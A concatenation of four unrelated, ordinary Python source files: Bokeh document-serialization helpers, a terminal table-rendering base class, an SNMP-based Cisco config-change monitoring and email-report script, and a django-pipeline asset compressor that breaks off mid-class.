from ..settings import settings
from ..util.serialization import make_globally_unique_id
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'FromCurdoc',
'OutputDocumentFor',
'RenderItem',
'RenderRoot',
'RenderRoots',
'standalone_docs_json',
'standalone_docs_json_and_render_items',
'submodel_has_python_callbacks',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
class FromCurdoc(object):
''' This class merely provides a non-None default value for ``theme``
arguments, since ``None`` itself is a meaningful value for users to pass.
'''
pass
@contextmanager
def OutputDocumentFor(objs, apply_theme=None, always_new=False):
''' Find or create a (possibly temporary) Document to use for serializing
Bokeh content.
Typical usage is similar to:
.. code-block:: python
with OutputDocumentFor(models):
(docs_json, [render_item]) = standalone_docs_json_and_render_items(models)
Inside the context manager, the models will be considered to be part of a single
Document, with any theme specified, which can thus be serialized as a unit. Where
possible, OutputDocumentFor attempts to use an existing Document. However, this is
not possible in three cases:
* If passed a series of models that have no Document at all, a new Document will
be created, and all the models will be added as roots. After the context manager
exits, the new Document will continue to be the models' document.
* If passed a subset of Document.roots, then OutputDocumentFor temporarily "re-homes"
the models in a new bare Document that is only available inside the context manager.
* If passed a list of models that have different documents, then OutputDocumentFor
temporarily "re-homes" the models in a new bare Document that is only available
inside the context manager.
    OutputDocumentFor will also perform document validation before yielding, if
``settings.perform_document_validation()`` is True.
    Args:
        objs (seq[Model]) :
a sequence of Models that will be serialized, and need a common document
apply_theme (Theme or FromCurdoc or None, optional):
Sets the theme for the doc while inside this context manager. (default: None)
If None, use whatever theme is on the document that is found or created
If FromCurdoc, use curdoc().theme, restoring any previous theme afterwards
If a Theme instance, use that theme, restoring any previous theme afterwards
always_new (bool, optional) :
Always return a new document, even in cases where it is otherwise possible
to use an existing document on models.
Yields:
Document
'''
# Note: Comms handling relies on the fact that the new_doc returned
# has models with the same IDs as they were started with
if not isinstance(objs, Sequence) or len(objs) == 0 or not all(isinstance(x, Model) for x in objs):
raise ValueError("OutputDocumentFor expects a sequence of Models")
def finish(): pass
docs = set(x.document for x in objs)
if None in docs: docs.remove(None)
if always_new:
def finish(): # NOQA
_dispose_temp_doc(objs)
doc = _create_temp_doc(objs)
else:
if len(docs) == 0:
doc = Document()
for model in objs:
doc.add_root(model)
# handle a single shared document
elif len(docs) == 1:
doc = docs.pop()
# we are not using all the roots, make a quick clone for outputting purposes
if set(objs) != set(doc.roots):
def finish(): # NOQA
_dispose_temp_doc(objs)
doc = _create_temp_doc(objs)
            # we are using all the roots of a single doc, just use doc as-is
            else:
                pass  # lgtm [py/unnecessary-pass]
# models have mixed docs, just make a quick clone
else:
def finish(): # NOQA
_dispose_temp_doc(objs)
doc = _create_temp_doc(objs)
if settings.perform_document_validation():
doc.validate()
_set_temp_theme(doc, apply_theme)
yield doc
_unset_temp_theme(doc)
finish()
class RenderItem(object):
def __init__(self, docid=None, token=None, elementid=None, roots=None, use_for_title=None):
if (docid is None and token is None) or (docid is not None and token is not None):
raise ValueError("either docid or sessionid must be provided")
if roots is None:
roots = OrderedDict()
elif isinstance(roots, list):
roots = OrderedDict([ (root, make_globally_unique_id()) for root in roots ])
self.docid = docid
self.token = token
self.elementid = elementid
self.roots = RenderRoots(roots)
self.use_for_title = use_for_title
def to_json(self):
json = {}
if self.docid is not None:
json["docid"] = self.docid
else:
json["token"] = self.token
if self.elementid is not None:
json["elementid"] = self.elementid
if self.roots:
json["roots"] = self.roots.to_json()
json["root_ids"] = [root.id for root in self.roots]
if self.use_for_title is not None:
json["use_for_title"] = self.use_for_title
return json
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
else:
return self.to_json() == other.to_json()
class RenderRoot(object):
def __init__(self, elementid, id, name=None, tags=None):
self.elementid = elementid
self.id = id
self.name = name or ""
self.tags = tags or []
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
else:
return self.elementid == other.elementid
class RenderRoots(object):
def __init__(self, roots):
self._roots = roots
def __len__(self):
        return len(self._roots)
def __getitem__(self, key):
if isinstance(key, int):
(root, elementid) = list(self._roots.items())[key]
else:
for root, elementid in self._roots.items():
if root.name == key:
break
else:
raise ValueError("root with '%s' name not found" % key)
return RenderRoot(elementid, root.id, root.name, root.tags)
def __getattr__(self, key):
return self.__getitem__(key)
def to_json(self):
return OrderedDict([ (root.id, elementid) for root, elementid in self._roots.items() ])
def standalone_docs_json(models):
    ''' Serialize one or more Bokeh Models or Documents into a JSON-ready
    mapping of generated document id to serialized document.
    '''
docs_json, render_items = standalone_docs_json_and_render_items(models)
return docs_json
def standalone_docs_json_and_render_items(models, suppress_callback_warning=False):
    ''' Serialize Bokeh Models or Documents, returning ``(docs_json,
    render_items)`` and warning when real Python callbacks would be lost.
    '''
if isinstance(models, (Model, Document)):
models = [models]
if not (isinstance(models, Sequence) and all(isinstance(x, (Model, Document)) for x in models)):
raise ValueError("Expected a Model, Document, or Sequence of Models or Documents")
if submodel_has_python_callbacks(models) and not suppress_callback_warning:
log.warning(_CALLBACKS_WARNING)
docs = {}
for model_or_doc in models:
if isinstance(model_or_doc, Document):
model = None
doc = model_or_doc
else:
model = model_or_doc
doc = model.document
if doc is None:
raise ValueError("A Bokeh Model must be part of a Document to render as standalone content")
if doc not in docs:
docs[doc] = (make_globally_unique_id(), OrderedDict())
(docid, roots) = docs[doc]
if model is not None:
roots[model] = make_globally_unique_id()
else:
for model in doc.roots:
roots[model] = make_globally_unique_id()
docs_json = {}
for doc, (docid, _) in docs.items():
docs_json[docid] = doc.to_json()
render_items = []
for _, (docid, roots) in docs.items():
render_items.append(RenderItem(docid, roots=roots))
return (docs_json, render_items)
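# A minimal usage sketch (hedged: any Bokeh model works, a Div from
# bokeh.models is assumed here purely for illustration):
#
#     from bokeh.models import Div
#     div = Div(text="hello")
#     with OutputDocumentFor([div]):
#         docs_json, render_items = standalone_docs_json_and_render_items([div])
#
# docs_json maps a generated document id to the serialized Document, and
# render_items[0].roots pairs each root model with a generated element id.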
def submodel_has_python_callbacks(models):
''' Traverses submodels to check for Python (event) callbacks
'''
has_python_callback = False
for model in collect_models(models):
if len(model._callbacks) > 0 or len(model._event_callbacks) > 0:
has_python_callback = True
break
return has_python_callback
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
_CALLBACKS_WARNING = """
You are generating standalone HTML/JS output, but trying to use real Python
callbacks (i.e. with on_change or on_event). This combination cannot work.
Only JavaScript callbacks may be used with standalone output. For more
information on JavaScript callbacks with Bokeh, see:
https://docs.bokeh.org/en/latest/docs/user_guide/interaction/callbacks.html
Alternatively, to use real Python callbacks, a Bokeh server application may
be used. For more information on building and running Bokeh applications, see:
https://docs.bokeh.org/en/latest/docs/user_guide/server.html
"""
def _create_temp_doc(models):
doc = Document()
for m in models:
doc._all_models[m.id] = m
m._temp_document = doc
for ref in m.references():
doc._all_models[ref.id] = ref
ref._temp_document = doc
doc._roots = models
return doc
def _dispose_temp_doc(models):
for m in models:
m._temp_document = None
for ref in m.references():
ref._temp_document = None
def _set_temp_theme(doc, apply_theme):
doc._old_theme = doc.theme
if apply_theme is FromCurdoc:
        from ..io import curdoc
doc.theme = curdoc().theme
elif apply_theme is not None:
doc.theme = apply_theme
def _unset_temp_theme(doc):
if not hasattr(doc, "_old_theme"):
return
doc.theme = doc._old_theme
del doc._old_theme
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
|
"""Base table class. Define just the bare minimum to build tables."""
from terminaltables.build import build_border, build_row, flatten
from terminaltables.width_and_alignment import align_and_pad_cell, max_dimensions
class BaseTable(object):
"""Base table class.
:ivar iter table_data: List (empty or list of lists of strings) representing the table.
:ivar str title: Optional title to show within the top border of the table.
:ivar bool inner_column_border: Separates columns.
:ivar bool inner_footing_row_border: Show a border before the last row.
:ivar bool inner_heading_row_border: Show a border after the first row.
:ivar bool inner_row_border: Show a border in between every row.
:ivar bool outer_border: Show the top, left, right, and bottom border.
:ivar dict justify_columns: Horizontal justification. Keys are column indexes (int). Values are right/left/center.
:ivar int padding_left: Number of spaces to pad on the left side of every cell.
:ivar int padding_right: Number of spaces to pad on the right side of every cell.
"""
CHAR_F_INNER_HORIZONTAL = '-'
CHAR_F_INNER_INTERSECT = '+'
CHAR_F_INNER_VERTICAL = '|'
CHAR_F_OUTER_LEFT_INTERSECT = '+'
CHAR_F_OUTER_LEFT_VERTICAL = '|'
CHAR_F_OUTER_RIGHT_INTERSECT = '+'
CHAR_F_OUTER_RIGHT_VERTICAL = '|'
CHAR_H_INNER_HORIZONTAL = '-'
CHAR_H_INNER_INTERSECT = '+'
CHAR_H_INNER_VERTICAL = '|'
CHAR_H_OUTER_LEFT_INTERSECT = '+'
CHAR_H_OUTER_LEFT_VERTICAL = '|'
CHAR_H_OUTER_RIGHT_INTERSECT = '+'
CHAR_H_OUTER_RIGHT_VERTICAL = '|'
CHAR_INNER_HORIZONTAL = '-'
CHAR_INNER_INTERSECT = '+'
CHAR_INNER_VERTICAL = '|'
CHAR_OUTER_BOTTOM_HORIZONTAL = '-'
CHAR_OUTER_BOTTOM_INTERSECT = '+'
CHAR_OUTER_BOTTOM_LEFT = '+'
CHAR_OUTER_BOTTOM_RIGHT = '+'
CHAR_OUTER_LEFT_INTERSECT = '+'
CHAR_OUTER_LEFT_VERTICAL = '|'
CHAR_OUTER_RIGHT_INTERSECT = '+'
CHAR_OUTER_RIGHT_VERTICAL = '|'
CHAR_OUTER_TOP_HORIZONTAL = '-'
CHAR_OUTER_TOP_INTERSECT = '+'
CHAR_OUTER_TOP_LEFT = '+'
CHAR_OUTER_TOP_RIGHT = '+'
def __init__(self, table_data, title=None):
"""Constructor.
:param iter table_data: List (empty or list of lists of strings) representing the table.
:param title: Optional title to show within the top border of the table.
"""
self.table_data = table_data
self.title = title
self.inner_column_border = True
self.inner_footing_row_border = False
self.inner_heading_row_border = True
self.inner_row_border = False
self.outer_border = True
self.justify_columns = dict() # {0: 'right', 1: 'left', 2: 'center'}
self.padding_left = 1
self.padding_right = 1
def horizontal_border(self, style, outer_widths):
"""Build any kind of horizontal border for the table.
:param str style: Type of border to return.
:param iter outer_widths: List of widths (with padding) for each column.
:return: Prepared border as a tuple of strings.
:rtype: tuple
"""
if style == 'top':
horizontal = self.CHAR_OUTER_TOP_HORIZONTAL
left = self.CHAR_OUTER_TOP_LEFT
intersect = self.CHAR_OUTER_TOP_INTERSECT if self.inner_column_border else ''
right = self.CHAR_OUTER_TOP_RIGHT
title = self.title
elif style == 'bottom':
horizontal = self.CHAR_OUTER_BOTTOM_HORIZONTAL
left = self.CHAR_OUTER_BOTTOM_LEFT
intersect = self.CHAR_OUTER_BOTTOM_INTERSECT if self.inner_column_border else ''
right = self.CHAR_OUTER_BOTTOM_RIGHT
title = None
elif style == 'heading':
horizontal = self.CHAR_H_INNER_HORIZONTAL
left = self.CHAR_H_OUTER_LEFT_INTERSECT if self.outer_border else ''
intersect = self.CHAR_H_INNER_INTERSECT if self.inner_column_border else ''
right = self.CHAR_H_OUTER_RIGHT_INTERSECT if self.outer_border else ''
title = None
elif style == 'footing':
horizontal = self.CHAR_F_INNER_HORIZONTAL
left = self.CHAR_F_OUTER_LEFT_INTERSECT if self.outer_border else ''
intersect = self.CHAR_F_INNER_INTERSECT if self.inner_column_border else ''
right = self.CHAR_F_OUTER_RIGHT_INTERSECT if self.outer_border else ''
title = None
else:
horizontal = self.CHAR_INNER_HORIZONTAL
left = self.CHAR_OUTER_LEFT_INTERSECT if self.outer_border else ''
intersect = self.CHAR_INNER_INTERSECT if self.inner_column_border else ''
right = self.CHAR_OUTER_RIGHT_INTERSECT if self.outer_border else ''
title = None
return build_border(outer_widths, horizontal, left, intersect, right, title)
def gen_row_lines(self, row, style, inner_widths, height):
r"""Combine cells in row and group them into lines with vertical borders.
Caller is expected to pass yielded lines to ''.join() to combine them into a printable line. Caller must append
newline character to the end of joined line.
In:
['Row One Column One', 'Two', 'Three']
Out:
[
('|', ' Row One Column One ', '|', ' Two ', '|', ' Three ', '|'),
]
In:
['Row One\nColumn One', 'Two', 'Three'],
Out:
[
('|', ' Row One ', '|', ' Two ', '|', ' Three ', '|'),
('|', ' Column One ', '|', ' ', '|', ' ', '|'),
]
:param iter row: One row in the table. List of cells.
:param str style: Type of border characters to use.
:param iter inner_widths: List of widths (no padding) for each column.
:param int height: Inner height (no padding) (number of lines) to expand row to.
:return: Yields lines split into components in a list. Caller must ''.join() line.
"""
cells_in_row = list()
# Resize row if it doesn't have enough cells.
if len(row) != len(inner_widths):
row = row + [''] * (len(inner_widths) - len(row))
# Pad and align each cell. Split each cell into lines to support multi-line cells.
for i, cell in enumerate(row):
align = (self.justify_columns.get(i),)
inner_dimensions = (inner_widths[i], height)
padding = (self.padding_left, self.padding_right, 0, 0)
cells_in_row.append(align_and_pad_cell(cell, align, inner_dimensions, padding))
# Determine border characters.
if style == 'heading':
left = self.CHAR_H_OUTER_LEFT_VERTICAL if self.outer_border else ''
center = self.CHAR_H_INNER_VERTICAL if self.inner_column_border else ''
right = self.CHAR_H_OUTER_RIGHT_VERTICAL if self.outer_border else ''
elif style == 'footing':
left = self.CHAR_F_OUTER_LEFT_VERTICAL if self.outer_border else ''
center = self.CHAR_F_INNER_VERTICAL if self.inner_column_border else ''
right = self.CHAR_F_OUTER_RIGHT_VERTICAL if self.outer_border else ''
else:
left = self.CHAR_OUTER_LEFT_VERTICAL if self.outer_border else ''
center = self.CHAR_INNER_VERTICAL if self.inner_column_border else ''
right = self.CHAR_OUTER_RIGHT_VERTICAL if self.outer_border else ''
# Yield each line.
for line in build_row(cells_in_row, left, center, right):
yield line
def gen_table(self, inner_widths, inner_heights, outer_widths):
"""Combine everything and yield every line of the entire table with borders.
:param iter inner_widths: List of widths (no padding) for each column.
:param iter inner_heights: List of heights (no padding) for each row.
:param iter outer_widths: List of widths (with padding) for each column.
:return:
"""
# Yield top border.
if self.outer_border:
yield self.horizontal_border('top', outer_widths)
# Yield table body.
row_count = len(self.table_data)
last_row_index, before_last_row_index = row_count - 1, row_count - 2
for i, row in enumerate(self.table_data):
# Yield the row line by line (e.g. multi-line rows).
if self.inner_heading_row_border and i == 0:
style = 'heading'
elif self.inner_footing_row_border and i == last_row_index:
style = 'footing'
else:
style = 'row'
for line in self.gen_row_lines(row, style, inner_widths, inner_heights[i]):
yield line
# If this is the last row then break. No separator needed.
if i == last_row_index:
break
# Yield heading separator.
if self.inner_heading_row_border and i == 0:
yield self.horizontal_border('heading', outer_widths)
# Yield footing separator.
elif self.inner_footing_row_border and i == before_last_row_index:
yield self.horizontal_border('footing', outer_widths)
# Yield row separator.
elif self.inner_row_border:
yield self.horizontal_border('row', outer_widths)
# Yield bottom border.
if self.outer_border:
yield self.horizontal_border('bottom', outer_widths)
@property
def table(self):
"""Return a large string of the entire table ready to be printed to the terminal."""
dimensions = max_dimensions(self.table_data, self.padding_left, self.padding_right)[:3]
return flatten(self.gen_table(*dimensions))
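# A minimal usage sketch: BaseTable renders directly with the plain '+', '-'
# and '|' characters defined above (the shipped AsciiTable and SingleTable
# classes subclass it and only swap the CHAR_* constants):
#
#     data = [['Name', 'Qty'], ['apples', '3'], ['pears', '12']]
#     print(BaseTable(data, title='Stock').table)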
|
|
#!/usr/bin/env python
from common import config
from common.entities import entities
from common import oids
from common.prettytable import PrettyTable
from common.util import cisco_tics_to_ctime
from common.util import send_email
from common.util import get_snmp_data
from common.util import myDict
from common.util import read_data_file
from common.util import write_data_file
import os
import time
def my_oids():
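    # Friendly aliases for the CISCO-CONFIG-MAN-MIB history timestamps (all
    # reported in sysUpTime tics), plus sysUptime itself; compare_snmp_saved()
    # uses them to detect reloads and running-config changes.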
oids_dict = {
'running_last_changed': oids.get('ccmHistoryRunningLastChanged'),
'running_last_saved': oids.get('ccmHistoryRunningLastSaved'),
'startup_last_changed': oids.get('ccmHistoryStartupLastChanged'),
'uptime': oids.get('sysUptime'),
}
return myDict(oids_dict)
def my_data_files():
data_folder = config.cfg.data_file_folder
data_files = ['last_changed.p', 'last_changed.json', 'last_changed.yml']
full_file_paths = []
for data_file in data_files:
file_name = '/'.join([data_folder, data_file])
full_file_paths.append(file_name)
return full_file_paths
def is_equal_dicts(data_dict):
    d_list = list(data_dict.itervalues())
    return d_list.count(d_list[0]) == len(d_list)
def my_get_snmp_data(device_tuple, user_tuple, oids_dict):
snmp_data_dict = myDict()
snmp_data_dict['epoch'] = str(time.time())
for oid_alias, oid_string in oids_dict.items():
snmp_data_dict[oid_alias] = get_snmp_data(
tuple(device_tuple),
tuple(user_tuple),
oid_string
)
return dict(snmp_data_dict)
def get_file_data(file_name):
file_data_dict = read_data_file(file_name)
return file_data_dict
def write_data(file_name, data):
write_data_file(file_name, data)
def setup():
setup_args = myDict()
setup_args.devices = entities.devices
setup_args.user_tuple = entities.users.user1
setup_args.oids_dict = my_oids()
setup_args.data_files = my_data_files()
setup_args.file_data_dict = myDict()
return setup_args
def get_device_data(data_files):
# Load saved device data if any, from all indicated data files.
# There are multiple data files just to illustrate the use of
# various data formats (JSON, YAML, PICKLE).
# Make sure the data structure is the same in each data file.
saved_data = myDict()
saved_devices = myDict()
for file_name in data_files:
saved_data[file_name] = get_file_data(file_name)
if is_equal_dicts(saved_data):
if saved_data[file_name] is not None:
saved_devices = saved_data[file_name]
else:
            print "ERROR: Data in data files differs! Deleting data files.", \
                data_files
for file_name in data_files:
if os.path.exists(file_name):
os.remove(file_name)
            raise ValueError("saved data files are inconsistent")
return saved_data, saved_devices
def get_device_snmp_data(devices, user_tuple, oids_dict):
# get snmp data from each device for each oid
snmp_data = myDict()
for dev_name, device_tuple in devices.iteritems():
snmp_data[dev_name] = my_get_snmp_data(
device_tuple,
user_tuple,
oids_dict
)
return snmp_data
def compare_snmp_saved(snmp_data, saved_devices):
# compare SNMP data with saved data
devices_dict = {}
for dev_name in list([x for x in snmp_data if x in saved_devices]):
saved = saved_devices[dev_name]
snmp = snmp_data[dev_name]
# logic to detect running config changes and reloads
change_detected = False
reload_detected = False
status_msg = ""
if (
snmp['uptime'] < saved['uptime'] or
snmp['running_last_changed'] < saved['running_last_changed']
):
reload_detected = True
if (
snmp['running_last_changed'] <=
config.cfg.reload_max_last_changed
):
status_msg = (
dev_name, "was RELOADED, running config NOT CHANGED."
)
change_detected = False
else:
status_msg = dev_name, "was RELOADED, running config CHANGED."
change_detected = True
elif snmp['running_last_changed'] == saved['running_last_changed']:
status_msg = dev_name, "running config NOT CHANGED."
change_detected = False
elif snmp['running_last_changed'] > saved['running_last_changed']:
status_msg = dev_name, "running config CHANGED."
change_detected = True
else:
print "ERROR: What?!?!"
raise ValueError()
# device info for report and notifications
devices_dict.update(
{
dev_name: {
'Status Message': status_msg,
'Change Detected': change_detected,
'Reload Detected': reload_detected,
'old': cisco_tics_to_ctime(
saved['epoch'],
saved['uptime'],
saved['running_last_changed'],
saved['running_last_saved'],
saved['startup_last_changed']
),
'new': cisco_tics_to_ctime(
snmp['epoch'],
snmp['uptime'],
snmp['running_last_changed'],
snmp['running_last_saved'],
snmp['startup_last_changed']
),
},
},
)
return devices_dict
def save_device_data(data_files, snmp_data):
# save all device data to file(s)
for file_name in data_files:
write_data(file_name, snmp_data)
def setup_tables(devices_dict):
# report on detected device info
report_name = "Cisco Device Configuration Change Detection Report"
report_time = time.ctime(time.time())
tables = {}
data_rows = {}
tables['header_table'] = PrettyTable(
[
'Report Name',
'Time of Report'
]
)
tables['header_table'].add_row([report_name, report_time])
tables['summary_table'] = PrettyTable(
[
'Total Device Count',
'Total Changed Device Count',
'Total Reloaded Device Count',
'Total Unchanged Device Count',
]
)
data_table_cols = [
'Device Name',
'Attribute',
'Current Value',
'Previous Value',
]
states = ['changed', 'unchanged']
for state in states:
tables[state] = PrettyTable(data_table_cols)
tables[state].align = 'r'
data_rows[state] = []
time_cols = [
'Scan Time',
'Up Time',
'Boot Time',
'Startup Config Changed Time',
'Running Config Saved Time',
'Running Config Changed Time'
]
tables_dict = {
'tables': tables,
'data_rows': data_rows,
'data_table_cols': data_table_cols,
'states': states,
'time_cols': time_cols,
}
return tables_dict
def compile_tables_data(devices_dict, tables_dict):
device_count = len(devices_dict)
reload_count = 0
change_count = 0
unchange_count = 0
yes = 'YES'
no = 'NO'
na = 'N/A (not saved)'
for dev_name in devices_dict.iterkeys():
dev = devices_dict[dev_name]
dev_old = dev['old']
dev_new = dev['new']
if dev['Reload Detected'] and dev['Change Detected']:
reload_count += 1
change_count += 1
cd = rd = yes
state = 'changed'
elif dev['Reload Detected']:
reload_count += 1
cd = no
rd = yes
state = 'unchanged'
elif dev['Change Detected']:
change_count += 1
cd = yes
rd = no
state = 'changed'
else:
cd = no
rd = no
state = 'unchanged'
tables_dict['data_rows'][state].extend(
[
[
dev_name,
'Change Detected',
cd,
na
],
[
dev_name,
'Reload Detected',
rd,
na
],
[
dev_name,
'Status Message',
dev['Status Message'],
na
],
]
)
for time_col in tables_dict['time_cols']:
tables_dict['data_rows'][state].append(
[
dev_name,
time_col,
dev_new[time_col],
dev_old[time_col]
],
)
unchange_count = device_count - change_count
tables_dict['tables']['summary_table'].add_row(
[
device_count,
change_count,
reload_count,
unchange_count,
]
)
for state in tables_dict['states']:
for data_row in tables_dict['data_rows'][state]:
tables_dict['tables'][state].add_row(data_row)
counts_dict = {
'change_count': change_count,
'unchange_count': unchange_count,
'device_count': device_count,
'reload_count': reload_count,
}
return tables_dict, counts_dict
def make_output(tables_dict, counts_dict):
ordered_tables = [
('header_table', '>>> Report Header <<<'),
('summary_table', '>>> Report Summary <<<'),
('changed', '>>> %d *Changed* Devices <<<' % (
counts_dict['change_count']
)),
('unchanged', '>>> %d *UnChanged* Devices <<<' % (
counts_dict['unchange_count']
)),
]
output = ""
for table_tuple in ordered_tables:
table = table_tuple[0]
msg = table_tuple[1]
if table == 'changed' and counts_dict['change_count'] == 0:
continue
elif table == 'unchanged' and counts_dict['unchange_count'] == 0:
continue
else:
output = output + msg + '\n' + str(tables_dict['tables'][table]) + '\n'
return output
def email_output(output):
m_from = config.cfg.email.get('from')
m_to = config.cfg.email.get('to')
subject = "Detected Device Config Change"
    send_email(m_from, m_to, subject, output)
return True
def main(args):
saved_data, saved_devices = get_device_data(
args.data_files,
)
snmp_data = get_device_snmp_data(
args.devices,
args.user_tuple,
args.oids_dict
)
devices_dict = compare_snmp_saved(
snmp_data,
saved_devices
)
save_device_data(args.data_files, snmp_data)
tables_dict = setup_tables(devices_dict)
tables_dict, counts_dict = compile_tables_data(devices_dict, tables_dict)
output = make_output(tables_dict, counts_dict)
# print to screen
print output
    # send email when a change was detected and 'email_enabled' is set
if config.cfg.email.get('email_enabled') and counts_dict['change_count'] > 0:
email_output(output)
if __name__ == "__main__":
args = setup()
while True:
main(args)
time.sleep(config.cfg.loop_pause_seconds)
|
|
from __future__ import unicode_literals
import base64
import os
import posixpath
import re
from itertools import takewhile
from django.utils.encoding import smart_bytes, force_text
from pipeline.conf import settings
from pipeline.storage import default_storage
from pipeline.utils import to_class, relpath
from pipeline.exceptions import CompressorError
URL_DETECTOR = r'url\([\'"]?([^\s)]+\.[a-z]+[^\'"\s]*)[\'"]?\)'
URL_REPLACER = r'url\(__EMBED__(.+?)(\?\d+)?\)'
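# URL_DETECTOR matches CSS url() references that carry a file extension, e.g.
# url("../img/logo.png?v=2") captures "../img/logo.png?v=2"; http(s) and
# protocol-relative URLs are skipped later in concatenate_and_rewrite().
# URL_REPLACER then matches the url(__EMBED__...) markers that
# construct_asset_path() leaves behind for with_data_uri() to inline.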
DEFAULT_TEMPLATE_FUNC = "template"
TEMPLATE_FUNC = r"""var template = function(str){var fn = new Function('obj', 'var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push(\''+str.replace(/\\/g, '\\\\').replace(/'/g, "\\'").replace(/<%=([\s\S]+?)%>/g,function(match,code){return "',"+code.replace(/\\'/g, "'")+",'";}).replace(/<%([\s\S]+?)%>/g,function(match,code){return "');"+code.replace(/\\'/g, "'").replace(/[\r\n\t]/g,' ')+"__p.push('";}).replace(/\r/g,'\\r').replace(/\n/g,'\\n').replace(/\t/g,'\\t')+"');}return __p.join('');");return fn;};"""
MIME_TYPES = {
'.png': 'image/png',
'.jpg': 'image/jpeg',
'.jpeg': 'image/jpeg',
'.gif': 'image/gif',
'.tif': 'image/tiff',
'.tiff': 'image/tiff',
'.ttf': 'font/truetype',
'.otf': 'font/opentype',
'.woff': 'font/woff'
}
EMBED_EXTS = MIME_TYPES.keys()
FONT_EXTS = ['.ttf', '.otf', '.woff']
class Compressor(object):
asset_contents = {}
def __init__(self, storage=default_storage, verbose=False):
self.storage = storage
self.verbose = verbose
@property
def js_compressor(self):
return to_class(settings.PIPELINE_JS_COMPRESSOR)
@property
def css_compressor(self):
return to_class(settings.PIPELINE_CSS_COMPRESSOR)
def compress_js(self, paths, templates=None, **kwargs):
"""Concatenate and compress JS files"""
js = self.concatenate(paths)
if templates:
js = js + self.compile_templates(templates)
if not settings.PIPELINE_DISABLE_WRAPPER:
js = "(function() { %s }).call(this);" % js
compressor = self.js_compressor
if compressor:
js = getattr(compressor(verbose=self.verbose), 'compress_js')(js)
return js
def compress_css(self, paths, output_filename, variant=None, **kwargs):
"""Concatenate and compress CSS files"""
css = self.concatenate_and_rewrite(paths, output_filename, variant)
compressor = self.css_compressor
if compressor:
css = getattr(compressor(verbose=self.verbose), 'compress_css')(css)
if not variant:
return css
elif variant == "datauri":
return self.with_data_uri(css)
else:
raise CompressorError("\"%s\" is not a valid variant" % variant)
def compile_templates(self, paths):
compiled = ""
if not paths:
return compiled
namespace = settings.PIPELINE_TEMPLATE_NAMESPACE
base_path = self.base_path(paths)
for path in paths:
contents = self.read_text(path)
contents = re.sub("\r?\n", "\\\\n", contents)
contents = re.sub("'", "\\'", contents)
name = self.template_name(path, base_path)
compiled += "%s['%s'] = %s('%s');\n" % (
namespace,
name,
settings.PIPELINE_TEMPLATE_FUNC,
contents
)
compiler = TEMPLATE_FUNC if settings.PIPELINE_TEMPLATE_FUNC == DEFAULT_TEMPLATE_FUNC else ""
return "\n".join([
"%(namespace)s = %(namespace)s || {};" % {'namespace': namespace},
compiler,
compiled
])
def base_path(self, paths):
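        # Component-wise longest common directory, e.g.
        # ['js/templates/a.jst', 'js/templates/b.jst'] -> 'js/templates'.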
def names_equal(name):
return all(n == name[0] for n in name[1:])
directory_levels = zip(*[p.split(os.sep) for p in paths])
return os.sep.join(x[0] for x in takewhile(names_equal, directory_levels))
def template_name(self, path, base):
"""Find out the name of a JS template"""
if not base:
path = os.path.basename(path)
if path == base:
base = os.path.dirname(path)
name = re.sub(r"^%s[\/\\]?(.*)%s$" % (
re.escape(base), re.escape(settings.PIPELINE_TEMPLATE_EXT)
), r"\1", path)
return re.sub(r"[\/\\]", "_", name)
def concatenate_and_rewrite(self, paths, output_filename, variant=None):
"""Concatenate together files and rewrite urls"""
stylesheets = []
for path in paths:
def reconstruct(match):
asset_path = match.group(1)
if asset_path.startswith("http") or asset_path.startswith("//"):
return "url(%s)" % asset_path
asset_url = self.construct_asset_path(asset_path, path,
output_filename, variant)
return "url(%s)" % asset_url
content = self.read_text(path)
# content needs to be unicode to avoid explosions with non-ascii chars
content = re.sub(URL_DETECTOR, reconstruct, content)
stylesheets.append(content)
return '\n'.join(stylesheets)
def concatenate(self, paths):
"""Concatenate together a list of files"""
return "\n".join([self.read_text(path) for path in paths])
def construct_asset_path(self, asset_path, css_path, output_filename, variant=None):
"""Return a rewritten asset URL for a stylesheet"""
public_path = self.absolute_path(asset_path, os.path.dirname(css_path).replace('\\', '/'))
if self.embeddable(public_path, variant):
return "__EMBED__%s" % public_path
if not posixpath.isabs(asset_path):
asset_path = self.relative_path(public_path, output_filename)
return asset_path
def embeddable(self, path, variant):
"""Is the asset embeddable ?"""
name, ext = os.path.splitext(path)
font = ext in FONT_EXTS
if not variant:
return False
if not (re.search(settings.PIPELINE_EMBED_PATH, path.replace('\\', '/')) and self.storage.exists(path)):
return False
        if ext not in EMBED_EXTS:
return False
if not (font or len(self.encoded_content(path)) < settings.PIPELINE_EMBED_MAX_IMAGE_SIZE):
return False
return True
def with_data_uri(self, css):
def datauri(match):
path = match.group(1)
mime_type = self.mime_type(path)
data = self.encoded_content(path)
return "url(\"data:%s;charset=utf-8;base64,%s\")" % (mime_type, data)
return re.sub(URL_REPLACER, datauri, css)
def encoded_content(self, path):
"""Return the base64 encoded contents"""
if path in self.__class__.asset_contents:
return self.__class__.asset_contents[path]
data = self.read_bytes(path)
self.__class__.asset_contents[path] = base64.b64encode(data)
return self.__class__.asset_contents[path]
def mime_type(self, path):
"""Get mime-type from filename"""
name, ext = os.path.splitext(path)
return MIME_TYPES[ext]
def absolute_path(self, path, start):
"""
Return the absolute public path for an asset,
given the path of the stylesheet that contains it.
"""
if posixpath.isabs(path):
path = posixpath.join(default_storage.location, path)
else:
path = posixpath.join(start, path)
return posixpath.normpath(path)
def relative_path(self, absolute_path, output_filename):
"""Rewrite paths relative to the output stylesheet path"""
absolute_path = posixpath.join(settings.PIPELINE_ROOT, absolute_path)
output_path = posixpath.join(settings.PIPELINE_ROOT, posixpath.dirname(output_filename))
return relpath(absolute_path, output_path)
def read_bytes(self, path):
"""Read file content in binary mode"""
file = default_storage.open(path)
content = file.read()
file.close()
return content
def read_text(self, path):
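        """Read file content and decode it to text"""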
content = self.read_bytes(path)
return force_text(content)
class CompressorBase(object):
def __init__(self, verbose):
self.verbose = verbose
def filter_css(self, css):
raise NotImplementedError
def filter_js(self, js):
raise NotImplementedError
class SubProcessCompressor(CompressorBase):
def execute_command(self, command, content):
import subprocess
